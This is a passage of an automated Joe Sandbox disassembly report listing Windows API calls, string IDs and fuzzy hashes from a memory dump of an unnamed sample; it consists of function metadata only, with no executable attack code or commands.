                                                                                                                      • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 0040984D
                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00409872
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$MoveWindow
                                                                                                                      • String ID: Listbox
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 003DC3BF
                                                                                                                      • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 003DC3D6
                                                                                                                      • SendMessageW.USER32(?,0000000D,?,00000000), ref: 003DC40E
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend
                                                                                                                      • String ID: @U=u
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(00000402,00000000,00000000), ref: 003F8D80
                                                                                                                      • SendMessageW.USER32(0000000C,00000000,?), ref: 003F8DC1
                                                                                                                      • SendMessageW.USER32(0000000C,00000000,?), ref: 003F8DE9
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend
                                                                                                                      • String ID: @U=u
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0040A27B
                                                                                                                      • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 0040A290
                                                                                                                      • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 0040A29D
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend
                                                                                                                      • String ID: msctls_trackbar32
                                                                                                                      APIs
                                                                                                                      • GetWindowTextLengthW.USER32(00000000), ref: 004094A6
                                                                                                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004094B5
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: LengthMessageSendTextWindow
                                                                                                                      • String ID: @U=u$edit
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003ACAEE: _memmove.LIBCMT ref: 003ACB2F
                                                                                                                      • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 003DC5E5
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend_memmove
                                                                                                                      • String ID: @U=u$ComboBox$ListBox
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003ACAEE: _memmove.LIBCMT ref: 003ACB2F
                                                                                                                      • SendMessageW.USER32(?,00000180,00000000,?), ref: 003DC4E1
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend_memmove
                                                                                                                      • String ID: @U=u$ComboBox$ListBox
                                                                                                                      • API String ID: 1456604079-2258501812
                                                                                                                      • Opcode ID: fb33c3f3e8df8ebf57a8f2d13a09380ccaea7c34aed07383266d5b9becc5512c
                                                                                                                      • Instruction ID: a39ce1f5e34a1eba8fe71d7668c528e958448c267ad381ebe38f6697292566c0
                                                                                                                      • Opcode Fuzzy Hash: fb33c3f3e8df8ebf57a8f2d13a09380ccaea7c34aed07383266d5b9becc5512c
                                                                                                                      • Instruction Fuzzy Hash: 6701F772A611096BCB07EBA0D962EFF33BC9F02300F140016F903EB2C1DA545E09D6A1
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003ACAEE: _memmove.LIBCMT ref: 003ACB2F
                                                                                                                      • SendMessageW.USER32(?,00000182,?,00000000), ref: 003DC562
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                       • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                       • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                       • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                       • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                       • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                       • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                       • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend_memmove
                                                                                                                      • String ID: @U=u$ComboBox$ListBox
                                                                                                                      • API String ID: 1456604079-2258501812
                                                                                                                      • Opcode ID: 252478487e7f0bf6614a018a47bd901b468784212dbab31d1853e6e2c9b922de
                                                                                                                      • Instruction ID: 7811b855b63fd1d1b33de61d860eed34142f4d8637c197d1dba93c9a5f19e254
                                                                                                                      • Opcode Fuzzy Hash: 252478487e7f0bf6614a018a47bd901b468784212dbab31d1853e6e2c9b922de
                                                                                                                      • Instruction Fuzzy Hash: E501F276A601096BCB02EBA4E902EFF73AD9B02701F240116F403E72C2DA549E0992A1
                                                                                                                      APIs
                                                                                                                      • GetForegroundWindow.USER32(?,00461810,00410327,000000FC,?,00000000,00000000,?,?,?,0041F381,?,?,?,?,?), ref: 0040D786
                                                                                                                      • GetFocus.USER32 ref: 0040D78E
                                                                                                                        • Part of subcall function 003BAF7D: GetWindowLongW.USER32(?,000000EB), ref: 003BAF8E
                                                                                                                        • Part of subcall function 003BB155: GetWindowLongW.USER32(?,000000EB), ref: 003BB166
                                                                                                                      • SendMessageW.USER32(?,000000B0,000001BC,000001C0), ref: 0040D800
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                       • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                       • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                       • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                       • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                       • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                       • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                       • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Long$FocusForegroundMessageSend
                                                                                                                      • String ID: @U=u
                                                                                                                      • API String ID: 3601265619-2594219639
                                                                                                                      • Opcode ID: 3b1c2c556a54166cc91e753065510340bcb006578e6bffacf7b1b972711a1c32
                                                                                                                      • Instruction ID: 6e45b818e9cfc2f92c86ff7eac2f7e667c222984f4a6157aebf616357a625190
                                                                                                                      • Opcode Fuzzy Hash: 3b1c2c556a54166cc91e753065510340bcb006578e6bffacf7b1b972711a1c32
                                                                                                                      • Instruction Fuzzy Hash: 22017932A005008FC725AF28DC85AA67BE6BB89314F18427AE525D73F1EB35AC16CB55
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 003A193B: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 003A1952
                                                                                                                      • SendMessageW.USER32(?,0000000C,00000000,?), ref: 003A1AA1
                                                                                                                      • GetParent.USER32(?), ref: 00412528
                                                                                                                      • InvalidateRect.USER32(00000000,?,003A1A74,?,00000000,00000001), ref: 0041252F
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                       • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                       • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                       • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                       • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                       • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                       • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                       • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$InvalidateParentRectTimeout
                                                                                                                      • String ID: @U=u
                                                                                                                      • API String ID: 3648793173-2594219639
                                                                                                                      • Opcode ID: 2e66addd6f6e4c2ee6c7231dac85ac1ea9eb91e0640ba1c5be65eb262c17104c
                                                                                                                      • Instruction ID: de7c4a308d081757124f4a387464ee5d4ce13cf25d7da5d6ec006048564f3c61
                                                                                                                      • Opcode Fuzzy Hash: 2e66addd6f6e4c2ee6c7231dac85ac1ea9eb91e0640ba1c5be65eb262c17104c
                                                                                                                      • Instruction Fuzzy Hash: 99F0ED34618240FBEF322F60DC09FA67BA9EF12780F104129F9819B1A0C6A69C51AB94
                                                                                                                      APIs
                                                                                                                      • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize), ref: 003C2F79
                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 003C2F80
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                       • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                       • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                       • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                       • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                       • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                       • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                       • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                      • String ID: RoInitialize$combase.dll
                                                                                                                      • API String ID: 2574300362-340411864
                                                                                                                      • Opcode ID: d4834e1aa04fb9793fc5c13ec193b915cde1f67dd5962e5e9b67a0824819ffc3
                                                                                                                      • Instruction ID: 01d49c68e998cf5131d4ef1eb65ce7c2230aae3bad4e7425384b0e12ece85770
                                                                                                                      • Opcode Fuzzy Hash: d4834e1aa04fb9793fc5c13ec193b915cde1f67dd5962e5e9b67a0824819ffc3
                                                                                                                      • Instruction Fuzzy Hash: 3FE01A70B94314ABDB605F70EC4AF963664B702B06FA00438F542D10E0EBFA8450DF0D
                                                                                                                      APIs
                                                                                                                      • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,003C2F4E), ref: 003C304E
                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 003C3055
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                       • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                       • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                       • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                       • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                       • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                       • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                       • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                      • String ID: RoUninitialize$combase.dll
                                                                                                                      • API String ID: 2574300362-2819208100
                                                                                                                      • Opcode ID: 0824f000bb444bcf18135fe78a24061308c238163ef915c25007862b94cb3769
                                                                                                                      • Instruction ID: 532ce34e09a60b485e2e8b44d725e2458cb7798400222eac89bc9ee7b287cf2c
                                                                                                                      • Opcode Fuzzy Hash: 0824f000bb444bcf18135fe78a24061308c238163ef915c25007862b94cb3769
                                                                                                                      • Instruction Fuzzy Hash: 29E0B671A54310ABDB315F61ED0DB963A64B711B06F600178F10AD10B0EBFA8510CB1E
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                       • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                       • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                       • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                       • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                       • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                       • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                       • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: LocalTime__swprintf
                                                                                                                      • String ID: %.3d$WIN_XPe
                                                                                                                      • API String ID: 2070861257-2409531811
                                                                                                                      • Opcode ID: 2b593c3704a85ace07113184662cbfafc3e847301da58308401bd4ea27f97f6f
                                                                                                                      • Instruction ID: 2d9edf544411ac31dda4c442464919b5c47239ffc28718b0f31d7b0139d3958e
                                                                                                                      • Opcode Fuzzy Hash: 2b593c3704a85ace07113184662cbfafc3e847301da58308401bd4ea27f97f6f
                                                                                                                      • Instruction Fuzzy Hash: C3E01271C0811CEAC755C6908D46AFA737CEF04381F6044D3BD56D1004D3399BD5AB6B
                                                                                                                      APIs
                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,004020EC,?,004022E0), ref: 00402104
                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00402116
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                       • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                       • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                       • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                       • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                       • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                       • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                       • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                      • String ID: GetProcessId$kernel32.dll
                                                                                                                      • API String ID: 2574300362-399901964
                                                                                                                      • Opcode ID: fae2c3d835075bcfef4de783754dd77a491fbb51e69fe98a964778dece923c04
                                                                                                                      • Instruction ID: 1d872c93ab84d5f35a8df8a469bad7503b62a124498070d998ba1485bd2c61da
                                                                                                                      • Opcode Fuzzy Hash: fae2c3d835075bcfef4de783754dd77a491fbb51e69fe98a964778dece923c04
                                                                                                                      • Instruction Fuzzy Hash: ACD0A7349003129FD7305F60E90E75336E4AB44305B20443BEA49F1ADED7F8C481CA1C
                                                                                                                      APIs
                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,003BE69C,76F90AE0,003BE5AC,0043DC28,?,?), ref: 003BE6B4
                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 003BE6C6
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                      • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                      • API String ID: 2574300362-192647395
                                                                                                                      • Opcode ID: ed73fedebbd0196d99be8005b53e2d4d612404d8f4d11925f2c35fd63f428810
                                                                                                                      • Instruction ID: ed5afa978d5fd1243e4460814b453d70c3d6ad6e802795edfb89095835d00769
                                                                                                                      • Opcode Fuzzy Hash: ed73fedebbd0196d99be8005b53e2d4d612404d8f4d11925f2c35fd63f428810
                                                                                                                      • Instruction Fuzzy Hash: F3D0A7359003228FD7315F34E8097D237D4AB24306B21542BE945D1A68D7B4C480861C
                                                                                                                      APIs
                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,003BE6D9,?,003BE55B,0043DC28,?,?), ref: 003BE6F1
                                                                                                                      • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 003BE703
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                      • String ID: IsWow64Process$kernel32.dll
                                                                                                                      • API String ID: 2574300362-3024904723
                                                                                                                      • Opcode ID: 78a79ca9d4ce6f4d4a60b7fc46064386e33e9e16340acb8e74daeca097190805
                                                                                                                      • Instruction ID: 08c7818590f81259e6649cfcdb1b2cbff79bd4eec1034ea19d4124ba8d032c21
                                                                                                                      • Opcode Fuzzy Hash: 78a79ca9d4ce6f4d4a60b7fc46064386e33e9e16340acb8e74daeca097190805
                                                                                                                      • Instruction Fuzzy Hash: 4FD0A7359003128FD7302F24E84E7D33BD4BB05306B21442BE995E2956DBB8C480C618
                                                                                                                      APIs
                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,003FEBAF,?,003FEAAC), ref: 003FEBC7
                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 003FEBD9
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                      • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                                                      • API String ID: 2574300362-1816364905
                                                                                                                      • Opcode ID: 9a9412a0630c3299b44ebeb347535543dc49ba7c9ef0fa45580efb93f1f62a90
                                                                                                                      • Instruction ID: 73afc2b0d3f9b540f0cedb58f6fef43700f77e5374c7bb3dc6d00b905fbcd9c7
                                                                                                                      • Opcode Fuzzy Hash: 9a9412a0630c3299b44ebeb347535543dc49ba7c9ef0fa45580efb93f1f62a90
                                                                                                                      • Instruction Fuzzy Hash: 1CD0A7349083129FD7301F30E849B6136D4AB44305B71842BF956D1664DBB8DC808618
                                                                                                                      APIs
                                                                                                                      • LoadLibraryA.KERNEL32(oleaut32.dll,?,003E135F,?,003E1440), ref: 003E1389
                                                                                                                      • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 003E139B
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                      • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                                                                                      • API String ID: 2574300362-1071820185
                                                                                                                      • Opcode ID: 60491ae9e523883d0b4a6207db14e7447ca060ec48b13c8efce7337438c39680
                                                                                                                      • Instruction ID: 97b071a060f3925139f68a39756ea18a90b190ef7df0f7b68fb959d34df89885
                                                                                                                      • Opcode Fuzzy Hash: 60491ae9e523883d0b4a6207db14e7447ca060ec48b13c8efce7337438c39680
                                                                                                                      • Instruction Fuzzy Hash: 68D0A734D003229FD7314F25EC0879236D4AF04706F25442AE885D19D8D674C884871C
                                                                                                                      APIs
                                                                                                                      • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,003E1371,?,003E1519), ref: 003E13B4
                                                                                                                      • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 003E13C6
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                      • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                                                                                      • API String ID: 2574300362-1587604923
                                                                                                                      • Opcode ID: 2ee053fc97fc30ac25680758d2ab832b640ded0568495f064b80bdd6d477dbe5
                                                                                                                      • Instruction ID: 7458478098516d0f3e53286e0a9e80cbbfdbf405951ba395dc769cae9fc17a34
                                                                                                                      • Opcode Fuzzy Hash: 2ee053fc97fc30ac25680758d2ab832b640ded0568495f064b80bdd6d477dbe5
                                                                                                                      • Instruction Fuzzy Hash: 87D0A738A003229FD7324F25E80879136E8AB40706F21442AE855D19ACDAB4C4848728
                                                                                                                      APIs
                                                                                                                      • LoadLibraryA.KERNEL32(advapi32.dll,?,00403AC2,?,00403CF7), ref: 00403ADA
                                                                                                                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00403AEC
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000002.00000002.3019730804.00000000003A1000.00000040.00000001.01000000.00000005.sdmp, Offset: 003A0000, based on PE: true
                                                                                                                      • Associated: 00000002.00000002.3019519990.00000000003A0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000044E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.000000000045A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.0000000000474000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3019730804.00000000004FC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021145681.0000000000502000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                      • Associated: 00000002.00000002.3021350460.0000000000503000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_2_2_3a0000_UNK_.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                      • API String ID: 2574300362-4033151799
                                                                                                                      • Opcode ID: 888458aa9a647a459eb4a7ebe83915e42a72437f44392c0a23560c5d8daf4f6d
                                                                                                                      • Instruction ID: 7481b2ad75a18a1e49d9df9a4a86f9e6f41a9d6471809fd4cc98782e9bdc236f
                                                                                                                      • Opcode Fuzzy Hash: 888458aa9a647a459eb4a7ebe83915e42a72437f44392c0a23560c5d8daf4f6d
                                                                                                                      • Instruction Fuzzy Hash: BED05E30A003139ED7204FA0A8097923AD8AB1630AB20443AE895A1698EAB8C4809A1C
